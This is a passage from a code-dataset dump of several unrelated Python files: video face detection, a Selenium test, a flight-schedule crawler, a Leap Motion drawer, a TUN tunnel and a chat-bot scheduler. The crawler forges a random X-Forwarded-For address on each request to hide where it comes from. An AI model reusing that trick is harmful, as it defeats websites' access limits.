as np\nimport math\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='0,1'\ntorch.cuda.set_device(-1)\n\n\nprint('Loading model..')\nssd_net = build_sfd('test', 640, 2)\nnet = ssd_net\nnet.load_state_dict(torch.load('./weights/Res50_pyramid.pth'))\nnet = net.cuda()\nnet.eval()\nprint('Finished loading model!')\n'''\nif torch.cuda.device_count() > 1:\n net = nn.DataParallel(net,[0,1])\n\nnet.to(device)\n'''\ndirpath = '/home/data/FACE/vid_3/'\nsavepath = '/home/data/FACE/vid-3-face/'\n\ndef detect_face(image, shrink):\n x = image\n if shrink != 1:\n x = cv2.resize(image, None, None, fx=shrink, fy=shrink, interpolation=cv2.INTER_LINEAR)\n\n ###***** shrink **********##########\n #print('shrink:{}'.format(shrink))\n\n width = x.shape[1]\n height = x.shape[0]\n x = x.astype(np.float32)\n x -= np.array([104, 117, 123],dtype=np.float32)\n\n x = torch.from_numpy(x).permute(2, 0, 1)\n x = x.unsqueeze(0)\n #x = Variable(x, volatile=True)\n x = Variable(x, volatile=True).cuda()\n\n net.priorbox = PriorBoxLayer(width,height)\n #the following part is very important,may be report memory error without them\n with torch.no_grad():\n y = net(x)\n\n detections = y.data\n\n scale = torch.Tensor([width, height, width, height])\n\n boxes=[]\n scores = []\n for i in range(detections.size(1)):\n j = 0\n while detections[0,i,j,0] >= 0.01:\n score = detections[0,i,j,0]\n pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n boxes.append([pt[0],pt[1],pt[2],pt[3]])\n scores.append(score)\n j += 1\n if j >= detections.size(2):\n break\n\n det_conf = np.array(scores)\n boxes = np.array(boxes)\n\n if boxes.shape[0] == 0:\n return np.array([[0,0,0,0,0.001]])\n\n det_xmin = boxes[:,0] / shrink\n det_ymin = boxes[:,1] / shrink\n det_xmax = boxes[:,2] / shrink\n det_ymax = boxes[:,3] / shrink\n det = np.column_stack((det_xmin, det_ymin, det_xmax, det_ymax, det_conf))\n\n keep_index = np.where(det[:, 4] >= 0)[0]\n det = det[keep_index, :]\n return det\n\n\ndef multi_scale_test(image, max_im_shrink):\n # shrink detecting and shrink only detect big face\n st = 0.5 if max_im_shrink >= 0.75 else 0.5 * max_im_shrink\n det_s = detect_face(image, st)\n if max_im_shrink > 0.75:\n det_s = np.row_stack((det_s,detect_face(image,0.75)))\n index = np.where(np.maximum(det_s[:, 2] - det_s[:, 0] + 1, det_s[:, 3] - det_s[:, 1] + 1) > 30)[0]\n det_s = det_s[index, :]\n # enlarge one times\n bt = min(2, max_im_shrink) if max_im_shrink > 1 else (st + max_im_shrink) / 2\n det_b = detect_face(image, bt)\n\n # enlarge small iamge x times for small face\n if max_im_shrink > 1.5:\n det_b = np.row_stack((det_b,detect_face(image,1.5)))\n if max_im_shrink > 2:\n bt *= 2\n while bt < max_im_shrink: # and bt <= 2:\n det_b = np.row_stack((det_b, detect_face(image, bt)))\n bt *= 2\n\n det_b = np.row_stack((det_b, detect_face(image, max_im_shrink)))\n\n # enlarge only detect small face\n if bt > 1:\n index = np.where(np.minimum(det_b[:, 2] - det_b[:, 0] + 1, det_b[:, 3] - det_b[:, 1] + 1) < 100)[0]\n det_b = det_b[index, :]\n else:\n index = np.where(np.maximum(det_b[:, 2] - det_b[:, 0] + 1, det_b[:, 3] - det_b[:, 1] + 1) > 30)[0]\n det_b = det_b[index, :]\n\n return det_s, det_b\n\ndef multi_scale_test_pyramid(image, max_shrink):\n # shrink detecting and shrink only detect big face\n det_b = detect_face(image, 0.25)\n index = np.where(\n np.maximum(det_b[:, 2] - det_b[:, 0] + 1, det_b[:, 3] - det_b[:, 1] + 1)\n > 30)[0]\n det_b = det_b[index, :]\n\n st = [1.25, 1.75, 2.25]\n for i in range(len(st)):\n if (st[i] <= max_shrink):\n det_temp = detect_face(image, st[i])\n # enlarge only detect small face\n if st[i] > 1:\n index = np.where(\n np.minimum(det_temp[:, 2] - det_temp[:, 0] + 1,\n det_temp[:, 3] - det_temp[:, 1] + 1) < 100)[0]\n det_temp = det_temp[index, :]\n else:\n index = np.where(\n np.maximum(det_temp[:, 2] - det_temp[:, 0] + 1,\n det_temp[:, 3] - det_temp[:, 1] + 1) > 30)[0]\n det_temp = det_temp[index, :]\n det_b = np.row_stack((det_b, det_temp))\n return det_b\n\n\n\ndef flip_test(image, shrink):\n image_f = cv2.flip(image, 1)\n det_f = detect_face(image_f, shrink)\n\n det_t = np.zeros(det_f.shape)\n det_t[:, 0] = image.shape[1] - det_f[:, 2]\n det_t[:, 1] = det_f[:, 1]\n det_t[:, 2] = image.shape[1] - det_f[:, 0]\n det_t[:, 3] = det_f[:, 3]\n det_t[:, 4] = det_f[:, 4]\n return det_t\n\n\ndef bbox_vote(det):\n order = det[:, 4].ravel().argsort()[::-1]\n det = det[order, :]\n while det.shape[0] > 0:\n # IOU\n area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)\n xx1 = np.maximum(det[0, 0], det[:, 0])\n yy1 = np.maximum(det[0, 1], det[:, 1])\n xx2 = np.minimum(det[0, 2], det[:, 2])\n yy2 = np.minimum(det[0, 3], det[:, 3])\n w = np.maximum(0.0, xx2 - xx1 + 1)\n h = np.maximum(0.0, yy2 - yy1 + 1)\n inter = w * h\n o = inter / (area[0] + area[:] - inter)\n\n # get needed merge det and delete these det\n merge_index = np.where(o >= 0.3)[0]\n det_accu = det[merge_index, :]\n det = np.delete(det, merge_index, 0)\n\n if merge_index.shape[0] <= 1:\n continue\n det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))\n max_score = np.max(det_accu[:, 4])\n det_accu_sum = np.zeros((1, 5))\n det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])\n det_accu_sum[:, 4] = max_score\n try:\n dets = np.row_stack((dets, det_accu_sum))\n except:\n dets = det_accu_sum\n\n dets = dets[0:750, :]\n return dets\n\ndef resize_image(image, height, width):\n top, bottom, left, right = (0, 0, 0, 0)\n\n h, w, _ = image.shape\n\n #对于长宽不相等的图片,找到最长的一边\n longest_edge = max(h, w) \n\n #计算短边需要增加多上像素宽度使其与长边等长\n if h < longest_edge:\n dh = longest_edge - h\n top = dh // 2\n bottom = dh - top\n elif w < longest_edge:\n dw = longest_edge - w\n left = dw // 2\n right = dw - left\n else:\n pass \n\n #RGB颜色\n BLACK = [0, 0, 0]\n\n #给图像增加边界,是图片长、宽等长,cv2.BORDER_CONSTANT指定边界颜色由value指定\n constant = cv2.copyMakeBorder(image, top , bottom, left, right, cv2.BORDER_CONSTANT, value = BLACK)\n\n #调整图像大小并返回\n return cv2.resize(constant, (height, width))\n\n\ndef write_to_txt(det,image,num):\n n=0\n s=0\n j=0\n #f.write('{:s}\\n'.format(str(num)+'.jpg'))\n #f.write('{:d}\\n'.format(det.shape[0]))\n for i in range(det.shape[0]):\n xmin = det[i][0]\n ymin = det[i][1]\n xmax = det[i][2]\n ymax = det[i][3]\n score = det[i][4]\n if n < score:\n n = score\n s = score\n j = i\n #f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\\n'.\n # format(xmin, ymin, (xmax - xmin + 1), (ymax - ymin + 1), score))\n #this part to crop image ,need the pixes number is int type\n #print('j:',j)\n #hight=ymax-ymin\n #width=xmax-xmin\n #[ymin:ymin+hight,xmin:xmin+width]\n hight=det[j][3] - det[j][1] + 1\n width=det[j][2] - det[j][0] + 1\n x1=det[j][0]\n y1=det[j][1]\n if x1 <0:\n x1=0\n if y1 <0:\n y1=0\n #[ymin:ymin+hight,xmin:xmin+width]\n cropimg=image[int(y1):int(y1+hight),int(x1):int(x1+width)]\n cropimg=resize_image(cropimg, 224, 224) #use to vgg16\n #cropimg=image[:int(130.1+242.4),175:int(175.4+313.7)]\n #new_img=Image.fromarray(cropimg) #transfrom the array to image\n #new_img.show()\n cv2.imwrite(savepath + str(num.split('-')[0]) + '/' + str(num) + '.jpg',cropimg)\n\n\nif __name__ == '__main__':\n '''\n subset = 'val' # val or test\n if subset is 'val':\n wider_face = sio.loadmat('/home/guoqiushan/share/workspace/caffe-ssd-s3fd/sfd_test_code/WIDER_FACE/wider_face_val.mat') # Val set\n else:\n wider_face = sio.loadmat('/home/guoqiushan/share/workspace/caffe-ssd-s3fd/sfd_test_code/WIDER_FACE/wider_face_test.mat') # Test set\n event_list = wider_face['event_list']\n file_list = wider_face['file_list']\n del wider_face\n\n Path = '/home/tmp_data_dir/zhaoyu/wider_face/WIDER_val/images/'\n save_path = '/home/guoqiushan/share/workspace/caffe-ssd-s3fd-focal/sfd_test_code/WIDER_FACE/eval_tools_old-version/tmp_haha' + '_' + subset + '/'\n\n \n for index, event in enumerate(event_list):\n filelist = file_list[index][0]\n if not os.path.exists(save_path + str(event[0][0].encode('utf-8'))[2:-1] ):\n os.makedirs(save_path + str(event[0][0].encode('utf-8'))[2:-1] )\n for num, file in enumerate(filelist):\n \n im_name = str(file[0][0].encode('utf-8'))[2:-1] \n Image_Path = Path + str(event[0][0].encode('utf-8'))[2:-1] +'/'+im_name[:] + '.jpg'\n print(Image_Path)\n '''\n\n list = os.listdir(dirpath) #list the content and file\n n=0\n for i in range(0,len(list)):\n path = os.path.join(dirpath,list[i])\n #save_path = os.path.join(savepath,list[i])\n os.makedirs(savepath+list[i].split('.')[0], exist_ok=True)\n checkpath=savepath+list[i].split('.')[0]\n filenum=len([lists for lists in os.listdir(checkpath) if os.path.isfile(os.path.join(checkpath, lists))])\n if filenum == 32:\n continue\n # input image\n #image = cv2.imread(path,cv2.IMREAD_COLOR)\n # input video\n camera = cv2.VideoCapture(path)\n if not camera.isOpened():\n print(\"cannot open camear\")\n exit(0)\n j=0\n while True:\n try:\n ret, frame = camera.read()\n #print('ret frame:',ret,frame.shape)\n if not ret:\n break\n image = cv2.cvtColor(frame, cv2.IMREAD_COLOR)\n #image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n max_im_shrink = (0x7fffffff / 200.0 / (image.shape[0] * image.shape[1])) ** 0.5 # the max size of input image for caffe\n #print('max_im_shrink:',max_im_shrink)\n max_im_shrink = 3 if max_im_shrink > 3 else max_im_shrink\n \n shrink = max_im_shrink if max_im_shrink < 1 else 1\n\n det0 = detect_face(image, shrink) # origin test\n det1 = flip_test(image, shrink) # flip test\n [det2, det3] = multi_scale_test(image, max_im_shrink)#min(2,1400/min(image.shape[0],image.shape[1]))) #multi-scale test\n #print('image:',image.shape)\n det4 = multi_scale_test_pyramid(image, max_im_shrink)\n det = np.row_stack((det0, det1, det2, det3, det4))\n\n dets = bbox_vote(det)\n j=j+1\n #print('j:',j)\n #f = open(savepath + list[i].split('.')[0]+'-'+str(j)+ '.txt', 'w')\n #print('det:',dets)\n #write_to_txt(f,dets,image,list[i].split('.')[0]+'-'+str(j))\n write_to_txt(dets,image,list[i].split('.')[0]+'-'+str(j))\n except:\n fi = open('/home/ye/bugvid3'+ '.txt', 'w')\n fi.write('{:s}\\n'.format(str(list[i])))\n fi.close()\n break\n if j == 32:\n #n+=1\n #print('finish-------------------')\n break\n n+=1\n print('n:',n)\n #print('event:%d num:%d' % (index + 1, num + 1))\n","sub_path":"test_for_video.py","file_name":"test_for_video.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334895515","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\n\r\n\r\nclass findElements():\r\n\r\n def test(self):\r\n baseUrl = \"https://courses.letskodeit.com/practice\"\r\n binary = FirefoxBinary(\"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\")\r\n driver = webdriver.Firefox(firefox_binary=binary)\r\n driver.get(baseUrl)\r\n\r\n web_elements = driver.find_elements(By.XPATH, \"//td[@class='course-name']\")\r\n for element in web_elements:\r\n print(element.text)\r\n driver.close()\r\n\r\nobj = findElements()\r\nobj.test()\r\n","sub_path":"findingElements/findElements.py","file_name":"findElements.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"86693439","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\nimport re\nimport pymongo\nimport datetime\nimport random\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nimport config\n\n\n\nfeichangzun = 'http://www.variflight.com'\nallUrl = \"http://www.variflight.com/sitemap.html?AE71649A58c77=\"\npausetime = 30000\n\n\nclass HANDL:\n def __init__(self, flight, flightlink):\n self.flight = flight\n self.flightlink = flightlink\n\n\nclass FCZPAC:\n def get_headers(self):\n headers = {\n \"X-Forwarded-For\": '%s.%s.%s.%s' % (\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),\n 'Host': \"www.variflight.com\",\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate'}\n return headers\n\n def getquerydate(self, aircarfNo):\n client = pymongo.MongoClient(host=config.mongo_config['host'], port=config.mongo_config['port'])\n db = client.swmdb\n eagleyedates = db.feichangzun\n cursor = eagleyedates.find({\"Info.fno\": aircarfNo}, {\"Info.Date\": 1}).sort(\"Info.Date\", -1).limit(1)\n for el in cursor:\n havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n return havedate\n\n def insertintomongo(self, flightdata):\n client = pymongo.MongoClient(host=config.mongo_config['host'], port=config.mongo_config['port'])\n db = client.swmdb\n eagleyedates = db.feichangzun\n eagleyedates.insert(flightdata)\n print(datetime.datetime.now(), 'insert mongodb success')\n\n @retry(stop_max_attempt_number=5)\n def getchuanghanglist(self):\n print('getchuanghanglist')\n try:\n startHtml = requests.get(allUrl, headers=self.get_headers())\n Soup = BeautifulSoup(startHtml.text, 'lxml')\n allA = Soup.find('div', class_='f_content').find_all('a')\n flight = []\n flightlink = []\n for i in range(1, len(allA)):\n if '3U' in allA[i].get_text():\n flight.append(allA[i].get_text())\n flightlink.append(allA[i].get('href'))\n\n return HANDL(flight, flightlink)\n except Exception as e:\n print(e)\n\n def getListData(self, flightlink, flightstr):\n print('getListData')\n today = datetime.datetime.now().date()\n allflightLink = []\n for i in range(len(flightlink)):\n alreadydate = self.getquerydate(flightstr[i])\n print(\"查询结果\", alreadydate)\n if alreadydate is not None:\n looptimes = (today + datetime.timedelta(days=7) - alreadydate).days\n tmpurl = (feichangzun + flightlink[i]).split('=')[0]\n for n in range(1, looptimes+1):\n flightlist = []\n querydate = alreadydate + datetime.timedelta(days=n)\n url = tmpurl + '&fdate={}'.format(querydate.strftime(\"%Y%m%d\"))\n listHtml = requests.get(url, headers=self.get_headers())\n listSoup = BeautifulSoup(listHtml.text, 'lxml')\n listUrl = listSoup.find('div', class_='fly_list')\n if listUrl is not None:\n listhref = listUrl.find('div', class_='li_box').find_all('a')\n for link in listhref:\n if '/schedule' in link.get('href'):\n flightlist.append(link.get('href'))\n print(\"find a flight\")\n allflightLink.append(flightlist)\n else:\n print(\"no data:\", n)\n continue\n else:\n tmpurl2 = (feichangzun + flightlink[i]).split('=')[0]\n for n in range(0, 7):\n flightlist = []\n querydate2 = today + datetime.timedelta(days=n)\n url2 = tmpurl2 + '&fdate={}'.format(querydate2.strftime(\"%Y%m%d\"))\n listHtml2 = requests.get(url2, headers=self.get_headers())\n listSoup2 = BeautifulSoup(listHtml2.text, 'lxml')\n listUrl2 = listSoup2.find('div', class_='fly_list')\n if listUrl2 is not None:\n listhref2 = listUrl2.find('div', class_='li_box').find_all('a')\n for link2 in listhref2:\n if '/schedule' in link2.get('href'):\n flightlist.append(link2.get('href'))\n print(\"find a flight\")\n allflightLink.append(flightlist)\n else:\n break\n return allflightLink # [[一个航班],[]]\n\n @retry(stop_max_attempt_number=5)\n def getaflightinfo(self, aflight): # 传进来一个航班的[link],获取到这个航班的信息\n flightinfolist = []\n for el in aflight:\n flightinfo = {}\n url = feichangzun + el\n # 发送请求\n listHtml = requests.get(url, headers=self.get_headers())\n listSoup = BeautifulSoup(listHtml.text, 'lxml')\n qfcity = listSoup.find('div', class_='cir_l curr').get_text().strip()\n ddcity = listSoup.find('div', class_='cir_r').get_text().strip()\n code = el.split('/')[2].split('-')\n qfcitycode = code[0]\n ddcitycode = code[1]\n fno = code[2].split('.')[0]\n city = listSoup.find_all('div', class_='fly_mian')\n qfsimple = city[0].find('h2').get('title').split(qfcity)[1]\n if 'T' in qfsimple:\n qfTerminal = 'T' + qfsimple.split('T')[1]\n else:\n qfTerminal = \"\"\n qf = qfcity + \" \" + qfsimple\n ddsimple = city[len(city)-1].find('h2').get('title').split(ddcity)[1]\n if 'T' in ddsimple:\n ddTerminal = 'T' + ddsimple.split('T')[1]\n else:\n ddTerminal = \"\"\n dd = ddcity + \" \" + ddsimple\n qftimestr = city[0].find('span', class_='date').get_text().strip()\n qfdate = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}').findall(qftimestr)\n qftime = qfdate[0] + \"T\" + re.compile('\\d{2}[:/]\\d{2}').findall(qftimestr)[0]\n ddtimestr = city[len(city)-1].find('span', class_='date').get_text().strip()\n dddate = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}').findall(ddtimestr)\n ddtime = dddate[0] + \"T\" + re.compile('\\d{2}[:/]\\d{2}').findall(ddtimestr)[0]\n state = listSoup.find('div', class_='reg').get_text()\n if state == '计划':\n stateid = 1\n else:\n stateid = 0\n flightinfo['qf'] = qf\n flightinfo['qf_city'] = qfcity\n flightinfo['qf_citycode'] = qfcitycode\n flightinfo['qf_simple'] = qfsimple\n flightinfo['dd'] = dd\n flightinfo['dd_simple'] = ddsimple\n flightinfo['dd_city'] = ddcity\n flightinfo['dd_citycode'] = ddcitycode\n flightinfo['qfTerminal'] = qfTerminal\n flightinfo['ddTerminal'] = ddTerminal\n flightinfo['jhqftime_full'] = qftime\n flightinfo['sjqftime_full'] = None\n flightinfo['jhddtime_full'] = ddtime\n flightinfo['sjddtime_full'] = None\n flightinfo['State'] = state\n flightinfo['stateid'] = stateid\n flightinfo['djk'] = '--'\n flightinfo['zjgt'] = '--'\n flightinfo['xlzp'] = '--'\n flightinfo['date'] = qfdate[0]\n flightinfo['fno'] = fno\n print('get a schedule from a schedule list')\n flightinfolist.append(flightinfo)\n return flightinfolist\n\n def start(self):\n print('start')\n flightdata = self.getchuanghanglist()\n flightlink = flightdata.flightlink\n flightstr = flightdata.flight\n listLink = self.getListData(flightlink, flightstr)\n for flight in listLink:\n flightdic = {}\n info = {}\n flightinfo = self.getaflightinfo(flight)\n if len(flightinfo) == 1:\n init = 0\n info['from'] = flightinfo[init]['qf']\n info['to'] = flightinfo[init]['dd']\n info['from_simple'] = flightinfo[init]['qf_simple']\n info['to_simple'] = flightinfo[init]['dd_simple']\n info['FromTerminal'] = flightinfo[init]['qfTerminal']\n info['ToTerminal'] = flightinfo[init]['ddTerminal']\n info['from_city'] = flightinfo[init]['qf_city']\n info['to_city'] = flightinfo[init]['dd_city']\n info['from_code'] = flightinfo[init]['qf_citycode']\n info['to_code'] = flightinfo[init]['dd_citycode']\n info['fno'] = flightinfo[init]['fno']\n info['Company'] = '3U'\n info['Date'] = flightinfo[init]['date']+\"T00:00:00\"\n info['zql'] = \"\"\n else:\n init = 1\n info['from'] = flightinfo[init]['qf']\n info['to'] = flightinfo[init]['dd']\n info['from_simple'] = flightinfo[init]['qf_simple']\n info['to_simple'] = flightinfo[init]['dd_simple']\n info['FromTerminal'] = flightinfo[init]['qfTerminal']\n info['ToTerminal'] = flightinfo[init]['ddTerminal']\n info['from_city'] = flightinfo[init]['qf_city']\n info['to_city'] = flightinfo[init]['dd_city']\n info['from_code'] = flightinfo[init]['qf_citycode']\n info['to_code'] = flightinfo[init]['dd_citycode']\n info['fno'] = flightinfo[init]['fno']\n info['Company'] = '3U'\n info['Date'] = flightinfo[init]['date']+\"T00:00:00\"\n info['zql'] = \"\"\n flightdic['Info'] = info\n flightdic['List'] = flightinfo\n self.insertintomongo(flightdic)\n\nif __name__ == '__main__':\n fp = FCZPAC()\n print(datetime.datetime.now(), \"The program has started\")\n fp.start()\n scheduler = BlockingScheduler()\n # scheduler.add_job(some_job, 'interval', hours=1)\n scheduler.add_job(fp.start, 'interval', hours=12)\n scheduler.start()\n","sub_path":"feichangzun/weihzuangIP.py","file_name":"weihzuangIP.py","file_ext":"py","file_size_in_byte":10630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555572445","text":"\n\"\"\"\n\nCS228: Human Computer Interaction\n\nDeliverable 2: Drawing skeletons of hands with pyGame and LeapMotion\n\n\"\"\"\n\nimport sys\nsys.path.insert(0, '..')\nimport Leap\nimport pygame\nimport constants\n\ncontroller = Leap.Controller()\n\nfrom pygameWindow import PYGAME_WINDOW\n\nglobal xMin, xMax, yMin, yMax\nxMin = 10000.0\nxMax = -10000.0\nyMin = 10000.0\nyMax = -10000.0\n\ndef Scale(var_to_scale, r1, r2, r3, r4):\n \n print(r1, r2)\n if r1 == r2:\n scaled_value = int((r1+r2)/2)\n else:\n old_range = r2-r1\n new_range = r4-r3\n \n scaled_value = (((var_to_scale - r1)*new_range)/old_range)+r3\n \n return(int(scaled_value))\n \ndef Handle_Frame(frame):\n \n global xMin, xMax, yMin, yMax\n\n hand = frame.hands[0]\n fingers = hand.fingers\n for finger in fingers:\n Handle_Finger(finger)\n\ndef Handle_Finger(finger):\n\n for bone_type in range(4):\n bone = Handle_Bone(finger, bone_type)\n\ndef Handle_Bone(finger, bone_type):\n\n bone = finger.bone(bone_type)\n \n base = bone.prev_joint\n base_x, base_y = Handle_Vector_From_Leap(base)\n \n tip = bone.next_joint\n tip_x, tip_y = Handle_Vector_From_Leap(tip)\n \n pyWindow.Draw_Black_Line(base_x, base_y, tip_x, tip_y, bone_type)\n return(bone)\n\ndef Handle_Vector_From_Leap(vector):\n global xMin, xMax, yMin, yMax\n\n x = int(vector[0]*-1.0)\n y = int(vector[2])\n \n if x < xMin:\n xMin = x\n if x > xMax:\n xMax = x\n if y < yMin:\n yMin = y\n if y > yMax:\n yMax = y\n\n x = Scale(x, xMax, xMin, 0, constants.windowWidth)\n y = Scale(y, yMax, yMin, constants.windowWidth, 0) \n \n return(x,y)\n\npyWindow = PYGAME_WINDOW()\n\nrunning = True\nwhile running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n pygame.event.get()\n pyWindow.Prepare()\n frame = controller.frame()\n handlist = frame.hands\n if (len(handlist) > 0):\n Handle_Frame(frame)\n\n pyWindow.Reveal()\n \npygame.quit()","sub_path":"Del02.py","file_name":"Del02.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"485285992","text":"#!/usr/bin/env python3\n\nimport ipaddress\nimport json\nimport os\nimport socket\nimport struct\nimport sys\n\nimport pytun\n\nMAGIC = b'\\x16\\xd9\\x6b\\x52'\nIP_V4_PROTO = b'\\x08\\x00'\n\nclass Config:\n def __init__(self, data):\n if data['mode'] == 'server':\n self.is_server = True\n elif data['mode'] == 'client':\n self.is_server = False\n else:\n raise RuntimeError('invalid mode \"%s\"' % data['mode'])\n\n self.address = data['address']\n self.port = data['port']\n\n self.iface_name = data['iface_name']\n self.iface_netmask = data['iface_netmask']\n self.iface_mtu = data['iface_mtu']\n\n self.iface_addr = ipaddress.IPv4Address(data['iface_addr'])\n self.iface_dstaddr = ipaddress.IPv4Address(data['iface_dstaddr'])\n\nclass IpPacket:\n def __init__(self, header, body):\n self.header = header\n self.body = body\n\n def to_byte_string(self):\n return self.header.to_byte_string() + self.body\n\nclass IpHeader:\n def __init__(self, raw):\n self.ver_ihl, \\\n self.tos, \\\n self.total_length, \\\n self.ident, \\\n self.flags_fragoffset, \\\n self.ttl, \\\n self.proto, \\\n self.chksum, \\\n src, \\\n dst, \\\n self.opt1, \\\n self.opt2, \\\n self.pad = struct.unpack('>BBHHHBBHIIHBB', raw)\n\n self.src = ipaddress.IPv4Address(src)\n self.dst = ipaddress.IPv4Address(dst)\n\n def to_byte_string(self):\n return struct.pack(\n '>BBHHHBBH4s4sHBB',\n self.ver_ihl,\n self.tos,\n self.total_length,\n self.ident,\n self.flags_fragoffset,\n self.ttl,\n self.proto,\n self.chksum,\n self.src.packed,\n self.dst.packed,\n self.opt1,\n self.opt2,\n self.pad,\n )\n\ndef main():\n config_filename = sys.argv[1]\n\n with open(config_filename) as config_file:\n config = Config(json.load(config_file))\n\n print('TUN interface addr: ', config.iface_addr)\n print('TUN interface dest addr:', config.iface_dstaddr)\n print('TUN interface name: ', config.iface_name)\n\n tun_iface = pytun.TunTapDevice(name=config.iface_name)\n\n tun_iface.addr = str(config.iface_addr)\n tun_iface.dstaddr = str(config.iface_dstaddr)\n tun_iface.netmask = config.iface_netmask\n tun_iface.mtu = config.iface_mtu\n\n tun_iface.up()\n\n addr_and_port = (config.address, config.port)\n\n if config.is_server:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('binding to %s, port %s' % addr_and_port)\n sock.bind(addr_and_port)\n sock.listen(1)\n print('waiting for incoming connection')\n conn, client_addr = sock.accept()\n print('accepted incoming connection from %s' % client_addr[0])\n\n else:\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('connecting to %s, port %s' % addr_and_port)\n conn.connect(addr_and_port)\n print('connected!')\n\n conn.setblocking(0)\n os.set_blocking(tun_iface.fileno(), False)\n\n while True:\n handle_iface_data(conn, tun_iface, config)\n handle_stream_data(conn, tun_iface, config)\n\ndef handle_iface_data(conn, tun_iface, config):\n try:\n buf = tun_iface.read(tun_iface.mtu)\n except:\n return\n\n flags = buf[:2]\n proto = buf[2:4]\n\n if proto != IP_V4_PROTO:\n return\n\n ip_packet = IpPacket(IpHeader(buf[4:28]), buf[28:])\n\n handle_ip_packet(ip_packet, conn, tun_iface, config)\n\ndef handle_stream_data(conn, tun_iface, config):\n try:\n data = conn.recv(10000)\n except:\n return\n\n while data != b'':\n if data[0:4] != MAGIC:\n raise RuntimeError('invalid magic number')\n\n ip_packet_length = struct.unpack('>I', data[4:8])[0]\n\n if len(data) < ip_packet_length + 8:\n raise RuntimeError('not enough data')\n\n ip_packet_packed = data[8:8 + ip_packet_length]\n\n data = data[8 + ip_packet_length:]\n\n ip_packet = IpPacket(IpHeader(ip_packet_packed[:24]), ip_packet_packed[24:])\n\n handle_ip_packet(ip_packet, conn, tun_iface, config)\n\ndef handle_ip_packet(ip_packet, conn, tun_iface, config):\n print('-' * 100)\n print(\n ip_packet.header.src,\n '→',\n ip_packet.header.dst,\n 'len: %d' % ip_packet.header.total_length,\n )\n\n ip_packet_packed = ip_packet.to_byte_string()\n\n if len(ip_packet_packed) != ip_packet.header.total_length:\n raise RuntimeError('invalid \"total length\" header value')\n\n if ip_packet.header.dst == config.iface_addr:\n print('sending to tun iface')\n buf = b'\\x00\\x00' + IP_V4_PROTO + ip_packet_packed\n while len(buf):\n nbytes = tun_iface.write(buf)\n buf = buf[nbytes:]\n elif ip_packet.header.dst == config.iface_dstaddr:\n print('sending to remote peer')\n ip_packet_length = struct.pack('>I', len(ip_packet_packed))\n buf = MAGIC + ip_packet_length + ip_packet_packed\n conn.sendall(buf)\n else:\n print('unknown destination, doing nothing')\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"579480722","text":"import nonebot as nb\nfrom nullbot.config import AUTO_UPDATES, AUTO_DAILY_REPORT, AUTO_UPDATE_MAX_RETRIES\nfrom spideroj.mongo import DataManager\nfrom datetime import datetime\nfrom nonebot.command import call_command\nimport pytz\n\n\nasync def debug(msg):\n bot = nb.get_bot()\n\n await bot.send_private_msg(user_id=724463877, message=msg)\n\n\n@nb.scheduler.scheduled_job('cron', hour='18')\nasync def daily_update():\n bot = nb.get_bot()\n\n for group_id in AUTO_UPDATES:\n await debug(f\"Updating for group: {group_id}\")\n dm = DataManager(group_id)\n\n members = await bot.get_group_member_list(group_id=group_id)\n dm.init(members)\n\n fails = await dm.get_and_save_all_user_summary()\n\n await debug(f\"Group [{group_id}] update failures: {fails}\")\n\n retry = 0\n while fails:\n fails = []\n for qq_id, user_id, platform in fails:\n ok, snapshot = await dm.get_and_save_user_summary(qq_id, user_id, platform)\n\n if not ok:\n fails.append((qq_id, user_id, platform))\n \n retry += 1\n if retry >= AUTO_UPDATE_MAX_RETRIES:\n await debug(f\"Failures after {AUTO_UPDATE_MAX_RETRIES} retries: {fails}\")\n break\n \n for group_id, mode in AUTO_DAILY_REPORT.items():\n ctx = {'anonymous': None, 'font': 1623440, 'group_id': group_id, 'message': [{'type': 'text', 'data': {'text': 'report'}}], 'message_id': 20804, 'message_type': 'group', 'post_type': 'message', 'raw_message': 'report', 'self_id': 2210705648, 'sender': {'age': 24, 'area': '北京', 'card': '', 'level': '冒泡', 'nickname': 'Nuullll', 'role': 'owner', 'sex': 'unknown', 'title': '', 'user_id': 724463877}, 'sub_type': 'normal', 'time': 1584248424, 'user_id': 724463877, 'to_me': True}\n if mode == 'week_delta':\n await call_command(bot, ctx, 'report')\n else:\n await call_command(bot, ctx, 'report_total')\n\n# @nb.scheduler.scheduled_job('cron', 